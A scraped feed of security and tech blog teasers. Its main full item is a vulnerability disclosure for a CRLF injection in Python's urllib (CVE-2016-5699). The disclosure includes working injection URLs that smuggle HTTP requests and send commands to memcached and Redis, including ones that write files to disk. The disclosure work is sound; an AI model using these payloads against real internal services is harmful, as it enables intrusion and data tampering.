    Posted by Christian Blichmann, Software Engineer BinDiff is a comparison tool for binary files that helps to quickly find differences and ...

    ...more

    Why we should fear a cashless world | Dominic Frisby

    Published: 2019-03-07 23:56:12

    Popularity: None

    Author: Dominic Frisby

    Poor people and small businesses rely on cash. A contactless system will likely entrench poverty and pave the way for terrifying levels of surveillance

    ...more

    Android Security 2015 Annual Report

    Published: 2019-03-07 23:55:29

    Popularity: None

    Author: Posted by Adrian Ludwig, Lead Engineer, Android Security

    Posted by Adrian Ludwig, Lead Engineer, Android Security Today, for the second year in a row , we’re releasing our Android Security Annual ...

    ...more

    Gatecoin | Bitcoin & Ethereum Token Exchange

    Published: 2019-03-07 23:53:34

    Popularity: None

    Author: by Bonnie Chan

    Gatecoin is a bitcoin and ethereum token exchange based in Hong Kong. Trade BTC and ETH worldwide with USD, EUR and HKD.

    ...more

    Blindspot Security

    Published: 2019-03-07 23:49:06

    Popularity: None

    Author: Posted by

    Update 1: The MITRE Corporation has assigned CVE-2016-5699 to this issue. Update 2: Remarkably, Blogger stripped the %00 element from a non-clickable URL when I originally posted this.  So I had to "fix" that by obfuscating it. *sigh*

    Overview

    Python's built-in URL library ("

    urllib2

    " in 2.x and "

    urllib

    " in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the

    http

    scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.

    The Bug


    The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named

    fetch3.py

    ):

    #!/usr/bin/env python3 import sys import urllib import urllib.error import urllib.request url = sys.argv[1] try: info = urllib.request.urlopen(url).info() print(info) except urllib.error.URLError as e: print(e)

    This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by

    urllib

    , a simple

    netcat

    listener was used:

    nc -l -p 12345 

    In a non-malicious example, we can hit that service by running:

    ./fetch3.py http://127.0.0.1:12345/foo 

    This caused the following request headers to appear in the

    netcat

    terminal:

    GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Connection: close Host: 127.0.0.1:12345

    Now we repeat this exercise with a malicious hostname:

    ./fetch3.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo 

    The observed HTTP request is:

    GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Host: 127.0.0.1 X-injected: header x-leftover: :12345 Connection: close 

    Here the attacker can fully control a new injected HTTP header.

    The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to lookup the appropriate hostname:

    http://localhost%0d%0ax-bar:%20:12345/foo 

    But this URL will connect to

    127.0.0.1

    as expected and allow for the same kind of injection:

    http://localhost%00%0d%0ax-bar:%20:12345/foo 

    Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect

    urllib

    to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.


    Attack Scenarios


    Here we discuss just a few of the scenarios where exploitation of this flaw could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there are a vast variety of different ways in which the flaw could be used, and we don't pretend to be able to predict them all.

    HTTP Header Injection and Request Smuggling


    The attack scenarios related to injecting extra headers and requests into an HTTP stream have been well documented for some time. Unlike the

    early request smuggling research

    , which has a complex variety of attacks, this simple injection would allow the addition of extra HTTP headers and request methods. While the addition of extra HTTP headers seems pretty limited in utility in this context, the ability to submit different HTTP methods and bodies is quite useful. For instance, if an ordinary HTTP request sent by

    urllib

    looks like this:

    GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Host: 127.0.0.1 Connection: close 

    Then an attacker could inject a whole extra HTTP request into the stream with URLs like:

    http://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo

    Which produces:

    GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Host: 127.0.0.1 Connection: Keep-Alive POST /bar HTTP/1.1 Host: 127.0.0.1 Content-Length: 31 {"new":"json","content":"here"} :12345 Connection: close 


    Attacking memcached


    As described in

    the protocol documentation

    ,

    memcached

    exposes a very simple network protocol for storing and retrieving cached values. Typically this service is deployed on application servers to speed up certain operations or share data between multiple instances without having to rely on slower database calls. Note that

    memcached

    is often not password protected because that is the default configuration. Developers and administrators often operate under the poorly conceived notion that "internal" services of these kinds can't be attacked by outsiders.

    In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access

    memcached

    instances. Consider the URL:

    http://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo 

    This generates the following HTTP request:

    GET /foo HTTP/1.1 Accept-Encoding: identity Connection: close User-Agent: Python-urllib/3.4 Host: 127.0.0.1 set foo 0 0 5 ABCDE :11211 

    When evaluating the above lines in light of memcached protocol syntax, most of the above produce syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):

    ERROR ERROR ERROR ERROR ERROR STORED ERROR ERROR 

    The "foo" value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.

    Attacking Redis

    Redis is very similar to

    memcached

    in several ways, though it also provides backup storage of data, several built-in data types, and the ability to execute Lua scripts. 

    Quite a bit

    has been

    published

     about

    attacking Redis

    in the last few years. Since Redis provides a TCP protocol very similar to

    memcached

    , and it also allows one to submit many erroneous commands before correct ones, the same attacks work in terms of fiddling with an application's stored data.

    In addition, it is possible to store files at arbitrary locations on the filesystem which contain a limited amount of attacker controlled data. For instance, this URL creates a new database file at

    /tmp/evil

    :

    http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo 

    And we can see the contents include a key/value pair set during the attack:

    # strings -n 3 /tmp/evil REDIS0006 foo bar 

    In theory, one could use this attack to gain remote code execution on Redis by (over-)writing various files owned by the service user, such as: 

     ~redis/.profile ~redis/.ssh/authorized_keys ... 

    However, in practice many of these files may not be available, not used by the system or otherwise not practical in attacks.

    Versions Affected


    All recent versions of Python in the 2.x and 3.x branches were affected. Cedric Buissart helpfully provided information on where the issue was fixed in each:



    While the fix has been available for a while in the latest versions, the lack of follow-though by Python Security means many stable OS distributions likely have not had back patches applied to address it. At least Debian Stable, as of this writing, is still vulnerable.


    Responsible Disclosure Log


    2016-01-15

    Notified Python Security of vulnerability with full details.

    2016-01-24

    Requested status from Python Security, due to lack of human response.


    2016-01-26

    Python Security list moderator said original notice held up in moderation queue. Mails now flowing.


    2016-02-07

    Requested status from Python Security, since no response to vulnerability had been received.


    2016-02-08

    Response from Python Security. Stated that issue is related to a general

    header injection bug

    , which has been fixed in recent versions. Belief that part of the problem lies in glibc; working with RedHat security on that.


    2016-02-08

    Asked if Python Security had requested a CVE.


    2016-02-12

    Python Security stated no CVE had been requested, will request one when other issues sorted out. Provided more information on glibc interactions.


    2016-02-12

    Responded in agreement that one aspect of the issue could be glibc's problem.


    2016-03-15

    Requested a status update from Python Security.


    2016-03-25

    Requested a status update from Python Security. Warned that typical disclosure policy has a 90 day limit.


    2016-06-14

    RedHat requested

     a CVE for the general header injection issue. Notified Python Security that full details of issue would be published due to inaction on their part.


    2016-06-15

    Full disclosure.



    Final Thoughts


    I find it irresponsible of the developers and distributors of Redis and memcached to provide default configurations that lack any authentication. Yes, I understand the reasoning that they should only be used only on "trusted internal networks". The problem is that very few internal networks, in practice, are much safer than the internet. We can't continue to make the same bad assumptions of a decade ago and expect security to improve. Even an unauthenticated service listening on localhost is risky these days. It wouldn't be hard to add an auto-generated, random password to these services during installation. That is, if the developers of these services took security seriously.

    ...more

    A year of Windows kernel font fuzzing #1: the results

    Published: 2019-03-07 23:48:39

    Popularity: None

    Author: Posted by

    Posted by Mateusz Jurczyk of Google Project Zero This post series is about how we used at-scale fuzzing to discover and report a tot...

    ...more

    How to Compromise the Enterprise Endpoint

    Published: 2019-03-07 23:48:02

    Popularity: None

    Author: Posted by

    Posted by Tavis Ormandy. Symantec is a popular vendor in the enterprise security market, their flagship product is   Symantec Endpoint ...

    ...more

    Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption

    Published: 2019-03-07 23:47:30

    Popularity: None

    Author: Posted by

    A security blog focusing on Android, the Linux Kernel and everything nice.

    ...more

    Solar Shed Summary: My Off Grid Office

    Published: 2019-03-07 23:43:27

    Popularity: None

    Author: Posted by

    A few months ago I moved to a few acres in the country, and needed somewhere to work - so I built myself a solar powered off grid office out...

    ...more

    EquationGroup Tool Leak – ExtraBacon Demo

    Published: 2019-03-07 23:40:36

    Popularity: None

    Author: Published by

    Hi there, You may have heard that recently (15/08/2016) a group known as Shadow Brokers released what are said to be a bunch of exploits and tools written and used by the NSA. Two tar were released…

    ...more

    Return to libstagefright: exploiting libutils on Android

    Published: 2019-03-07 23:37:16

    Popularity: None

    Author: Posted by

    Posted by Mark Brand, Invalidator of Unic�o�d�e I’ve been investigating different fuzzing approaches on some Android devices recently, ...

    ...more

    "Why do you work in security instead of something more lasting ?"

    Published: 2019-03-07 23:33:56

    Popularity: None

    Author: Posted by

    This post grew out of a friend on Facebook asking (I paraphrase) "why do you spend your time on security instead of using your brainpower f...

    ...more

    90 Cents of Every “Pay-for-Performance” Dollar are Paid for Luck

    Published: 2019-03-07 23:33:15

    Popularity: None

    Author: Posted by Moshe Levy, Hebrew University of Jerusalem, on

    Read our latest post from Moshe Levy (Jerusalem School of Business Administration) at

    ...more

    Consensus without Trust: Cryptographic Enforcement of Distributed Protocols

    Published: 2019-03-07 23:30:10

    Popularity: None

    Author: Posted by

    Intro Most services on the internet work by having a lot of servers owned by the same group of people running software that receives inp...

    ...more

    Pixel Security: Better, Faster, Stronger

    Published: 2019-03-07 23:29:37

    Popularity: None

    Author: Posted by Paul Crowley, Senior Software Engineer and Paul Lawrence, Senior Software Engineer

    Posted by Paul Crowley, Senior Software Engineer and Paul Lawrence, Senior Software Engineer [Cross-posted from the Android Developers Blog...

    ...more

    The Purple Team Pentest

    Published: 2019-03-07 23:27:38

    Popularity: None

    Author: Posted by

    It’s not particularly clear whether a marketing intern thought he was being clever or a fatigued pentester thought she was being cynical whe...

    ...more

    Facebook Accused of Building Censorship Tools for China – China Digital Times (CDT)

    Published: 2019-03-07 23:27:29

    Popularity: None

    Author: Posted By:

    founder has raised eyebrows with a string of apparent attempts to woo Chinese authorities, from giving speeches in Chinese and jogging through Beijing smog, to leaving a Xi Jinping book on his desk while hosting former cyberczar Lu Wei, and even asking Xi to name his daughter. In March, a leaked propaganda directive calling for steps against “malicious commentary” on these efforts prompted speculation that Beijing might prove more receptive than many had supposed. So did internet regulator Ren Xianliang’s recent reiteration of the longstanding official position that “as long as they respect China’s laws, don’t harm the interests of the country, and don’t harm the interests of consumers, we welcome [Facebook and Google] to enter China.” On Tuesday, The New York Times’ Mike Isaac reported that the company has taken concrete steps towards satisfying these requirements, with the development of experimental tools that might be wielded by a Chinese partner company.

    [… T]he project illustrates the extent to which Facebook may be willing to compromise one of its core mission statements, “to make the world more open and connected,” to gain access to a market of 1.4 billion Chinese people. Even as Facebook faces pressure to continue growing — Mr. Zuckerberg has often asked where the company’s next billion users will come from — China has been cordoned off to the social network since 2009 because of the government’s strict rules around censorship of user content.

    The suppression software has been contentious within Facebook, which is separately grappling with what should or should not be shown to its users after the American presidential election’s unexpected outcome spurred questions over fake news on the social network. Several employees who were working on the project have left Facebook after expressing misgivings about it, according to the current and former employees.

    [… S]ome officials responsible for China’s tech policy have been willing to entertain the idea of Facebook’s operating in the country. It would legitimize China’s strict style of internet governance, and if done according to official standards, would enable easy tracking of political opinions deemed problematic. Even so, resistance remains at the top levels of Chinese leadership. [Source]

    Bloomberg’s Sarah Frier similarly stressed that there seems to be no immediate prospect of Facebook’s entry into China:

    Chief Executive Officer Mark Zuckerberg visits China frequently, and yet the company is no closer to putting employees in a downtown Beijing office it leased in 2014, according to a person familiar with the matter. The company hasn’t been able to get a license to put workers there, even though they would be selling ads shown outside the country, not running a domestic social network, the person said. The ad sales work is currently done in Hong Kong. The person asked not to be identified discussing private matters.

    […] China and Facebook aren’t engaged in ongoing talks about the conditions of a return, according to a separate person familiar with the matter who asked not to be identified as the matter is private. The ability to censor content would be a precondition, not the deciding factor, in any entry to the Chinese market, the person said. [Source]

    The current climate in China is hardly welcoming for foreign firms, particularly following the recent passage of a draconian new cybersecurity law which mandates self-censorship, unspecified “technical support” to authorities, security reviews, and local storage of user data. Cartoonist summed this situation up last week with a skeptical take on the third “World Internet Conference” held in Wuzhen:

    The banner reads “World Disinternet Conference,” with bulian (不联), meaning “disconnected,” replacing hulian (互联), or “interconnected,” in the Chinese term for “internet,” hulianwang (互联网). Read more from CDT on the three World Internet Conferences China has hosted, including a round-up on this year’s with translation from a Xinhua commentary proclaiming Xi Jinping an “internet sage.”

    CDT Chinese has compiled a few reactions to the New York Times report from Sina Weibo. Some users mocked Facebook’s supplications to the “Imperial Court”:

    Jianchang’anbujianchang’an (@见长安不见长安): Cutting off your balls before entering the Imperial Palace?

    Luyoudahongren (@旅游大红人): Hmm, developing a castrated magical weapon to present to the emperor, this palace eunuch’s wishes are very sincere

    Guliquan (@贾利权): Facebook castrates itself, seeking entry to the Imperial Palace. [Chinese]

    Others questioned the need for a limited Facebook in China, and its chances of ever getting there:

    Guandengwuyanzu (@关灯吴彦祖): What would this actually achieve? So, we can access the same site as people abroad, but can only partially see what they post?

    Xialuotewuhuishangdeguowang (@夏洛特舞会上的国王): So this is Facebook’s corporate value system? If so, besides feeling that there’s still no way they can enter the Chinese market, I’d also like to send them a “Grass Mud Horse” [“Fuck Your Mother”]!

    000000000oo (000000000哦哦): Making a Chinese version with restricted content, it’s still just a Local Area Network [not the real Internet]

    Gongchandafahao (@共產大灋好): So what do we need you here for?

    [The screenshot shows a “comments forbidden” notice on an article headlined “Xi Jinping: ‘We should welcome well-intentioned online comments’”]

    Hulianwangdedashir (@互联网的大事儿): Better not to come at all …

    Amiaoyu (@阿喵鱼): I want YouTube! I want Twitter! I don’t want to have to pay for a VPN every month ……

    Zhengzaianfengdehuozhe (@正在安分的活着): We don’t need you, we need Twitter, we need YouTube, we need Google, we need Line, we need Instagram

    Fengchezhuanbuting (@枫车转不停): I think there’s a way for Line to come in, but there’s already no room for Facebook

    Liulianweihuabinggan (@榴莲威化饼干): There are a few apps that I hope never make it to the mainland … In the end, those who can all jump the Great Firewall. If it wasn’t there to block the others, they’d surge over and report everything back to the authorities

    Fangtianyougou (@方田有沟): If Facebook hands the authority to examine and verify content to a Chinese partner firm, “China will be the biggest winner” [mocking a common formula for headlines in official media]. [Chinese]

    Some users suggested rebranding, with one alluding to Xi Jinping’s call in February for state media to “take ‘Party’ as their surname”:

    CD_Yim (@CD_Yim): If this is true, they should change the name to “book.” They’ve lost face.

    Lihailewodege_ (@厉害了我的歌_): They should call it Partybook →_→

    Liming_shouwang_zhe (@黎明守望者): Motherfucker, Facebook also has to take Party as its surname? [Chinese]

    CDT cartoonist proposed a new logo:

    Another cartoon in a similar spirit has been deleted from Sina Weibo, according to the FreeWeibo monitoring site:

    AdachushengzaiMeiguo (@Ada出生在美国): Facebook surnamed ‘Party,’ deletes posts at will, arbitrarily prohibits, perfectly loyal, please reconsider. [Chinese]

    On Twitter, meanwhile, dozens of users scornfully contrasted Facebook’s apparent readiness to bow to Beijing with its reluctance to address the spread of fake news among users in America and elsewhere. By the U.S. election day earlier this month, fake news was substantially outperforming articles from mainstream news outlets on the platform. Founder and CEO Mark Zuckerberg initially protested that “the idea that fake news on Facebook … influenced the election … is a pretty crazy idea.” But criticism continued to mount, with The New York Times warning Zuckerberg not to let “liars and con artists hijack his platform.” He responded on Facebook that “we do not want to be arbiters of truth,” and that company would prefer “erring on the side of letting people share what they want whenever possible,” but said that the company was cautiously working to address the issue.

    There has been no shortage of suggestions on ways to do this. According to some reports, Facebook already “absolutely [has] the tools to shut down fake news,” but has held off for fear of angering conservative users.

    The U.S. election has also prompted renewed calls for information controls in China, where official campaigns against “rumor”—loosely and often politically defined—are well established. Officials reiterated the urgency of battling rumors and online extremism at the World Internet Conference last week, as Reuters’ Catherine Cadell reports:

    Ren Xianling, the vice minister of China’s top internet authority, said on Thursday that the process was akin to “installing brakes on a car before driving on the road”.

    Ren, number two at the Cyberspace Administration of China (CAC), recommended using identification systems for netizens who post fake news and , so they could “reward and punish” them.

    The comments come as U.S. social networks Facebook Inc and Twitter Inc face a backlash over their role in the spread of false and malicious information generated by users, which some say helped sway the U.S. presidential election in favor of Republican candidate Donald Trump.

    […] Ma Huateng, the chairman and chief executive of Holdings Ltd, which oversees China’s most popular social networking app, , said Trump’s win sent an “alarm” to the global community about the dangers of fake news, a view echoed by other executives at the event. [Source]

    An editorial in the state-run Global Times mocked the hypocrisy of the “Western media’s crusade against Facebook”:

    [… M]edia platforms have the right to publish any information in the political field and cracking down on online rumors would confine freedom of speech. Isn’t this what the West advocates when it is at odds with emerging countries over Internet management? Why don’t they uphold those propositions any more?

    China’s crackdown on online rumors a few years ago was harshly condemned by the West. It was a popular saying online that rumors could force truth to come out at that time, which morally affirmed the role of rumors. This argument was also hyped by Western media. Things changed really quickly, as the anxiety over Internet management has been transferred to the US.

    […] The Internet contains enormous energy, and the political risks that go along with it are unpredictable. China is on its way to strengthening Internet management, although how to manage it is another question. China is also right in demanding that US Internet companies, including Google and Facebook, abide by Chinese laws and be subject to supervision if they want to enter China market.

    […] Problems and conflicts caused by globalization and informationization have been unleashed in the Internet era, but the Western democratic system appears to be unable to address them. [Source]

    But while some see the fake news pandemic as vindication of Chinese policy, others are unconvinced. At South China Morning Post last week, Jane Cai and Phoenix Kwong reported “Pony” Ma Huateng’s further statement at the WIC that “Tencent has always been strict in cracking down on fake news and we see it as very necessary.” But not all the Chinese executives in attendance shared his enthusiasm, they noted:

    […] Wu Wenhui, chief executive of China Reading, an online literature company, said regulators should not resort to extreme measures to tackle the problem unless it was absolutely necessary.

    “The US incidents show the internet is more and more decentralised and people do not unanimously follow the opinions of experts,” Wu said.

    “Regulators should respect the convenient platforms [of ] for the public to express their opinions. They should also be open and be honest in communicating with the public,” he said. [Source]

    Politico’s Jack Shafer, meanwhile, argued this week that “the cure for fake news is worse than the disease”:

    [… T]he fake news moral panic looks to have legs, which means that somebody is likely to get hurt before it abates. Already, otherwise intelligent and calm observers are cheering plans set forth by Facebook’s Mark Zuckerberg to censor users’ news feeds in a fashion that will eliminate fake news. Do we really want Facebook exercising this sort of top-down power to determine what is true or false? Wouldn’t we be revolted if one company owned all the newsstands and decided what was proper and improper reading fare?

    Once established to crush fake news, the Facebook mechanism could be repurposed to crush other types of information that might cause moral panic. This cure for fake news is worse than the disease.

    […] Fake news is too important to be left to the Facebook remedy—Mark Zuckerberg is no arbiter of truth. First, we need to learn to live with a certain level of background fake news without overreacting. Next, we need to instruct readers on how to spot and avoid fake news, which many publications are already doing. A few years ago, Factcheck.org showed readers how to identify bogus email claims. Snopes does yeoman work in this area, as does BuzzFeed. Software wizards should be encouraged to create filters and tools, such as browser extensions, that sniff out bogusity. [Source]

    Concerns about the concentration of information control powers in private hands have also arisen in China with, for example, a recent account suspension on Tencent’s WeChat platform over allegations that cheap roast duck came from diseased birds. From Oiwan Lam at Global Voices:

    The WeChat account of Chinese news outlet News Breakfast was recently suspended for “spreading rumors.” News Breakfast has 400,000 subscribers in WeChat and is operated by East Day, a Shanghai city government-affiliated media outlet.

    […] The incident compelled Xu Shiping, the CEO of East Day, to write two open letters to Pony Ma Huateng, the chairman of WeChat’s parent company, Tencent, questioning the monopolized status of the Internet giant and its arbitrary power over online content and censorship. Like many other Chinese news outlets, News Breakfast publishes some stories only on WeChat, rather than publishing on its website and then promoting on the social media and content service.

    […] What is Tencent? It is an Internet company. It has a capital structure and cannot represent people’s interests […] In the past two years, Mr. Ma has been a guest of local governments which have provided corporate access to data which should be belong to the public. There is no evaluation of the capital value of such data access. […] Tencent’s monopoly is harmful to the state. Wait and see. Today it can exercise its unrestrained power on media outlets, tomorrow it will challenge state authority. […]

    […] If one day, all China’s media outlets are under the rule of Tencent, can we still have our “China Dream”? [Source]

    Writing at Medium, ethnographer Christina Xu noted that false pro-Trump stories have proliferated in China, despite its strict information controls. Such stories, she suggested, are more a symptom than an underlying cause:

    In an excellent series of tweets about rhetorical strategy, Bailey Poland wrote: “[Facts are] the support structure. It’s the foundation of reality on which an argument can be built, but it cannot be the whole argument.”

    In China, that foundation of reality is eroded alongside trust in institutions previously tasked with upholding the truth. Contrary to popular sentiment in the US, Chinese readers don’t blindly trust the state-run media. Rather, they distrust it so much that they don’t trust any form of media, instead putting their faith in what their friends and family tell them. No institution is trusted enough to act as a definitive fact-checker, and so it’s easy for misinformation to proliferate unchecked.

    This has been China’s story for decades. In 2016, it is starting to be the US’ story as well.

    Propaganda that is blatant and issued from the top is easy to spot and refute; here in China, it’s literally printed on red banners your eyes learn to skip past. The spread of small falsehoods and uncertainty is murkier, more organic, and much harder to undo. The distortions of reality come in layers, each more surreal than the last. Fighting it requires more than just pointing out the facts; it requires restoring faith in a shared understanding of the truth. This is the lesson Americans need to learn, and fast. [Source]

    Inside the Great Firewall? Download the CDT Browser Extension to access CDT from China without a VPN.

    ...more

    Security Through Transparency

    Published: 2019-03-07 23:23:54

    Popularity: None

    Author: Posted by Ryan Hurst and Gary Belvin, Security and Privacy Engineering

    Posted by Ryan Hurst and Gary Belvin, Security and Privacy Engineering Encryption is a foundational technology for the web. We’ve spent a l...

    ...more

    Moving towards a more secure web

    Published: 2019-03-07 23:23:09

    Popularity: None

    Author: Posted by Emily Schechter, Chrome Security Team

    Posted by Emily Schechter, Chrome Security Team [Updated on 12/5/16 with instructions for developers] Developers : Read more about how to ...

    ...more

    Open-Sourcing Google Earth Enterprise | Google Cloud Blog

    Published: 2019-03-07 23:22:46

    Popularity: None

    Author: 2017. You can also get more information on the GEE project site created by our partners.

    Posted by Avnish Bhatnagar, Senior Technical Solutions Engineer, Google Cloud

    ...more

    Time To Upgrade Your Python: TLS v1.2 Will Soon Be Mandatory

    Published: 2019-03-07 23:21:29

    Popularity: None

    Author: Posted by

    If you're using an older Python without the most secure TLS implementation, this is the year to get serious about upgrading. Otherwise next ...

    ...more

    Announcing the first SHA1 collision

    Published: 2019-03-07 23:19:28

    Popularity: None

    Author: Posted by Marc Stevens (CWI Amsterdam), Elie Bursztein (Google), Pierre Karpman (CWI Amsterdam), Ange Albertini (Google), Yarik Markov (Google), Alex Petit Bianco (Google), Clement Baisse (Google)

    Posted by Marc Stevens (CWI Amsterdam), Elie Bursztein (Google), Pierre Karpman (CWI Amsterdam), Ange Albertini (Google), Yarik Markov (Goog...

    ...more

    Ancient Wisdom Reveals 6 Rituals That Will Make You Happy - Barking Up The Wrong Tree

    Published: 2019-03-07 23:17:28

    Popularity: None

    Author: Written By:

    Forget self-help. Ancient wisdom has happiness tips that align with science. Bestselling author Ryan Holiday explains how Stoicism can make you smile.

    ...more

    An FBI Counterterrorism Agent Tracked Me Down Because I Took a Picture of This

    Published: 2019-03-07 23:15:25

    Popularity: None

    Author: By James Prigoff

    This is a statement from one of the plaintiffs speaking at Thursday's press conference announcing the ACLU's lawsuit challenging the government's controversial Suspicious Activity Reporting program.Good morning. My name is James Prigoff. I am 86 years old and a retired senior corporate executive, having been president of a Levi Strauss division and previously the senior vice president of the Sara Lee Corporation in Chicago. I am also a professional photographer – in fact, I have been a photographer for most of my life. My specialty is photographing murals, graffiti art, and other community public art. I am the co-author of three books utilizing my photographs, one of which, Spraycan Art, has sold over 200,000 copies. My photographs appear in countless other publications and my photography has been exhibited at the Smithsonian in Washington and in many other galleries. I have lectured on photography and public art in museums, universities, and venues worldwide.I have never had an experience like I had when attempting to photograph the "Rainbow Swash" outside Boston in 2004. Let me explain.The Rainbow Swash is an iconic piece of public art near Boston painted on the circumference of a 140-foot high liquefied natural gas storage tank in 1971 and repainted in 1992 at an adjacent site. It is actually one of the largest copyrighted pieces of art in the world. The original artist was Korita Kent.I went to Dorchester, Mass., to photograph it, but before I could take a picture, I was confronted by two security guards who came through their gate and told me I could not because the tank was on private property. I pointed out that I, being well outside the fenced area, was not on private property – but they insisted I leave. If one goes to Wikipedia there are number of excellent close-up shots for the entire world to see.A few months later, I found a business card on the front door of my home in Sacramento from Agent A. Ayaz of the Joint Terrorism Task Force, asking me to call him. One of my neighbors, an elderly woman, told me that two men wearing suits had come to her door to ask her about me, her neighbor.When I called Agent Ayaz, he asked if I had been in Boston recently. At that moment I realized that the security guards at the Rainbow Swash site must have taken down the rental car license plate number and reported me to a law enforcement agency. I never gave the guards any information about myself, so I must have been traced across country via my rental car record.So, consider this: A professional photographer taking a photo of a well-known Boston landmark is now considered to be engaged in suspicious terrorist activity?I lived through the McCarthy era, so I know how false accusations, surveillance, and keeping files on innocent people can destroy their careers and lives. I am deeply troubled that the SAR program may be recreating that same climate of false accusation and fear today.Photography is an important part of my life, and I plan to keep photographing public art and public places that contain WPA murals and other architectural sites – as I have been doing for 69 years. Why have my artistic pursuits landed me in a national database potentially linking me to "terrorist" activities? There is no reason for it. This program must be stopped.Learn more about government surveillance and other civil liberties issues: Sign up for breaking news alerts, follow us on Twitter, and like us on Facebook.

    ...more

    1.7.22

    Published: 2019-03-07 23:05:11

    Popularity: None

    Author: Posted by

    This release introduces Burp Suite Mobile Assistant , a new tool to facilitate testing of iOS apps with Burp Suite. It supports the followi...

    ...more

    OSS-Fuzz: Five months later, and rewarding projects

    Published: 2019-03-07 23:01:44

    Popularity: None

    Author: Posted by Oliver Chang, Abhishek Arya (Security Engineers, Chrome Security), Kostya Serebryany (Software Engineer, Dynamic Tools), and Josh Armour (Security Program Manager)

    Posted by Oliver Chang, Abhishek Arya (Security Engineers, Chrome Security), Kostya Serebryany (Software Engineer, Dynamic Tools), and Josh ...

    ...more

    Final removal of trust in WoSign and StartCom Certificates

    Published: 2019-03-07 22:57:54

    Popularity: None

    Author: Posted by Andrew Whalley and Devon O'Brien, Chrome Security

    Posted by Andrew Whalley and Devon O'Brien, Chrome Security As previously announced , Chrome has been in the process of removing trust fro...

    ...more

    Trust Issues: Exploiting TrustZone TEEs

    Published: 2019-03-07 22:57:06

    Popularity: None

    Author: Posted by

    Posted by Gal Beniamini, Project Zero Mobile devices are becoming an increasingly privacy-sensitive platform. Nowadays, devices process ...

    ...more

    Bypassing VirtualBox Process Hardening on Windows

    Published: 2019-03-07 22:53:41

    Popularity: None

    Author: Posted by

    Posted by James Forshaw, Project Zero Processes on Windows are securable objects, which prevents one user logged into a Windows machine...

    ...more

    CCleanup: A Vast Number of Machines at Risk

    Published: 2019-03-07 22:51:28

    Popularity: None

    Author: Posted by

    A blog from the world class Intelligence Group, Talos, Cisco's Intelligence Group

    ...more

    The Great DOM Fuzz-off of 2017

    Published: 2019-03-07 22:50:21

    Popularity: None

    Author: Posted by

    Posted by Ivan Fratric, Project Zero Introduction Historically, DOM engines have been one of the largest sources of web browser bugs. A...

    ...more

    Broadening HSTS to secure more of the Web

    Published: 2019-03-07 22:49:40

    Popularity: None

    Author: Posted by Ben McIlwain, Google Registry

    Posted by Ben McIlwain, Google Registry The security of the Web is of the utmost importance to Google. One of the most powerful tools in th...

    ...more

    Behind the Masq: Yet more DNS, and DHCP, vulnerabilities

    Published: 2019-03-07 22:49:01

    Popularity: None

    Author: Posted by Fermin J. Serna, Staff Software Engineer, Matt Linton, Senior Security Engineer and Kevin Stadmeyer, Technical Program Manager

    Posted by Fermin J. Serna, Staff Software Engineer, Matt Linton, Senior Security Engineer and Kevin Stadmeyer, Technical Program Manager O...

    ...more

    chromiumos/platform/crosvm - Git at Google

    Published: 2019-03-07 22:49:00

    Popularity: None

    Author: by Lepton Wu

    crosvm - The Chrome OS Virtual Machine Monitor

    This component, known as crosvm, runs untrusted operating systems along with virtualized devices. No actual hardware is emulated. This only runs VMs through the Linux's KVM interface. What makes crosvm unique is a focus on safety within the programming language and a sandbox around the virtual devices to protect the kernel from attack in case of an exploit in the devices.

    Usage

    To see the usage information for your version of crosvm, run crosvm or crosvm run --help.

    Boot a Kernel

    To run a very basic VM with just a kernel and default devices:

    $ crosvm run "${KERNEL_PATH}" 

    The uncompressed kernel image, also known as vmlinux, can be found in your kernel build directory in the case of x86 at arch/x86/boot/compressed/vmlinux.

    Rootfs

    In most cases, you will want to give the VM a virtual block device to use as a root file system:

    $ crosvm run -r "${ROOT_IMAGE}" "${KERNEL_PATH}" 

    The root image must be a path to a disk image formatted in a way that the kernel can read. Typically this is a squashfs image made with mksquashfs or an ext4 image made with mkfs.ext4. By using the -r argument, the kernel is automatically told to use that image as the root, and therefore can only be given once. More disks can be given with -d or --rwdisk if a writable disk is desired.

    To run crosvm with a writable rootfs:

    WARNING: Writable disks are at risk of corruption by a malicious or malfunctioning guest OS.

    crosvm run --rwdisk "${ROOT_IMAGE}" -p "root=/dev/vda" vmlinux 

    NOTE: If more disks arguments are added prior to the desired rootfs image, the root=/dev/vda must be adjusted to the appropriate letter.

    Control Socket

